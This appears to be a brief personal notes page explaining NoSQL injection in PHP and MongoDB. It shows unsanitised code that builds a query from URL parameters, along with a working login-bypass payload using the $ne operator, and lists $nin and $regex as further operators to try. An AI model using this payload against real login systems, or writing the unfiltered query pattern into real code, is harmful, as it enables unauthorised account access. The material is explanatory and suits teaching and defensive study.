NoSQL Injection (NoSQLi)

According to a company or an application needs, a NoSQL database may be used instead of the traditional SQL database. This is often the case when using GraphQL API Model.

While NoSQL database such as MongoDB are inherently more resilient to common attacks, they may still be exploited.

Assuming, we have the following PHP code:

// dummy.php?username=admin&password=toto
$result = $db_accounts->find([
  'username'=> $_GET['username'],
  'password' => $_GET['password'],
]);

The following query will be executed:

db.accounts.find({ "username": "admin", "password": "toto" });

In PHP, parameters can be transformed to an array: dummy.php?username=admin&password[$ne]=toto allowing us to control the request and bypass authentication.

// $_GET['password'] is now an array
// There is no filtering on the type of input, we can inject NoSQL code
db.accounts.find({ "username": "admin", "password": { "$ne": "toto" }});

👻 To-do 👻

Stuff that I found, but never read/used yet.

$nin for "NOT IN" array
$regex for a condition based on a regex

NoSQL Injection (NoSQLi) ¶

👻 To-do 👻 ¶

NoSQL Injection (NoSQLi)

👻 To-do 👻